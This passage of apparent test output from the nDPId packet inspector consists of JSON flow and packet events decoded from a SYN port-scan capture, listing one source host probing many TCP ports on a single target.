-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAACoGrAysEAAIQA2GNIzSBFbdUoMYAAAAAGACDAAoOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsltUAADUGfJ2sEAAIQA2GNIzSF3XdUoMYAAAAAGACCAAZGgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAskLgAADgGf7qsEAAIQA2GNIzSB\/LdUoMYAAAAAGACBAAsnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsULwAADcGwLasEAAIQA2GNIzSFJXdUoMYAAAAAGACEAAT+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsuIAAACYGafKsEAAIQA2GNIzSF0rdUoMYAAAAAGACDAAVRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsa\/cAACkGs3usEAAIQA2GNIzSDMTdUoMYAAAAAGACCAAjywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsYnoAACkGvPisEAAIQA2GNIzSBBTdUoMYAAAAAGACCAAsewAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAs0v0AADYGP3WsEAAIQA2GNIzSAgDdUoMYAAAAAGACDAAqjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsecQAADIGnK6sEAAIQA2GNIzSwAXdUoMYAAAAAGACDABsiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAss3cAADAGZPusEAAIQA2GNIzSDL3dUoMYAAAAAGACBAAn0gAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1278275061338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275061338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsgRIAACoGnWCsEAAIQA2GNIzTGgrdU4MZAAAAAGACDAASggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsvUQAACYGZS6sEAAIQA2GNIzTATfdU4MZAAAAAGACDAArVQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsHykAADQG9UmsEAAIQA2GNIzTCqXdU4MZAAAAAGACBAAp5wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsL60AACgG8MWsEAAIQA2GNIzTH5TdU4MZAAAAAGACBAAU+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsXrcAACYGw7usEAAIQA2GNIzTAFrdU4MZAAAAAGACDAAsMgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/GMAAC4GHg+sEAAIQA2GNIzTAjPdU4MZAAAAAGACDAAqWQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs3yEAADoGL1GsEAAIQA2GNIzTJpXdU4MZAAAAAGACDAAF9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAssu0AACkGbIWsEAAIQA2GNIzTB8DdU4MZAAAAAGACCAAozAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsiNYAADQGi5ysEAAIQA2GNIzTALPdU4MZAAAAAGACBAAz2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpYAACUG+NysEAAIQA2GNIzTH53dU4MZAAAAAGACCAAQ7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsn1UAACYGgx2sEAAIQA2GNIzTFubdU4MZAAAAAGACDAAVpgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAAC4Gx\/isEAAIQA2GNIzTB\/HdU4MZAAAAAGACDAAkmwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsOmgAADcG1wqsEAAIQA2GNIzTKAPdU4MZAAAAAGACEAAAiQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsnegAACYGhIqsEAAIQA2GNIzTAQPdU4MZAAAAAGACDAAriQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 